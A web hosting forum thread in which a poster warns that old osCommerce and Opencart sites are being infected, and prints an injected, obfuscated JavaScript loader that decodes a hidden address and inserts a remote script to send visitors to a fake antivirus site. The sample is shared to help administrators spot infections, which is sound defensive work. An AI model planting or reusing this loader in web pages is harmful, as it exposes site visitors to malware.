Results 1 to 2 of 2
  1. #1

    Exclamation Identifying osCommerce Malware

    Hello all,
    Just sharing some info about websites infected with malware, due to running an older version of OScommerce. In case you are managing sites with an older version of the OScommerce shopping cart, please upgrade.

    The last 3 months have been witness to an increase in the intensity of attacks targeting shopping cart software like OSCommerce. We have seen variants of the following malware present on many websites running shopping carts like OSCommerce and Opencart.

    <script type≈ "text/javascript" >if (typeof(redef_colors)≈ ≈ "undefined") { var div_colors ≈ new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d'); var redef_colors ≈ 1; var colors_picked ≈ 0; func​tion div_pick_colors(t, styled) {var s ≈ ""; for (j≈ 0; j <t.length; j++) {var c_rgb ≈ t[j]; for (i≈ 1; i <7; i++) {var c_clr ≈ c_rgb.substr(i++, 2); if (c_clr!≈ "00") s +≈ String·fromCharCode (parseInt(c_clr, 16)-15); }}if (styled) {s ≈ s.substr(0, 36) + s.substr(36, (s.length-38)) + div_colors[1].substr(0, 1)+new Date().getTime() + s.substr((s.length-2)); } else {s ≈ s.substr(36, (s.length-38)) + div_colors[1].substr(0, 1)+new Date().getTime(); }return s; } func​tion try_pick_colors() {try { if(!document.getElementById || !document.createElement){ doc​ument.write (div_pick_colors(div_colors, 1)); } else {var new_cstyle≈ document.createElement(" sc​ript "); new_cstyle.type≈ "text/javascript"; new_cstyle.src≈ div_pick_colors(div_colors, 0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); }} catch(e) { }try {check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } </ sc​ript >
    This code attempts to display a malicious Iframe which can lead the user to a fake AV website, opening the door to malware being installed on the personal computer.

    Hope this helps.

  2. #2
    Join Date
    Feb 2004

    Thanks for the heads up.. we have also seen a fair few attacks on zencart, again older versions.


Similar Threads

  1. identifying bots?
    By Nature-Talk in forum Programming Discussion
    Replies: 8
    Last Post: 12-28-2006, 12:02 PM
  2. Need Help Identifying Mushrooms
    By NuPixel in forum Web Hosting Lounge
    Replies: 15
    Last Post: 09-06-2006, 07:52 PM
  3. Identifying an Old Machine
    By CArmstrong in forum Web Hosting Lounge
    Replies: 4
    Last Post: 03-17-2004, 11:54 AM
  4. Identifying HD as bottleneck
    By anile8 in forum Dedicated Server
    Replies: 12
    Last Post: 11-19-2003, 12:23 AM
  5. Identifying yourself as a Reseller...
    By WhatWasThat in forum Reseller Hosting
    Replies: 9
    Last Post: 09-08-2003, 01:09 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts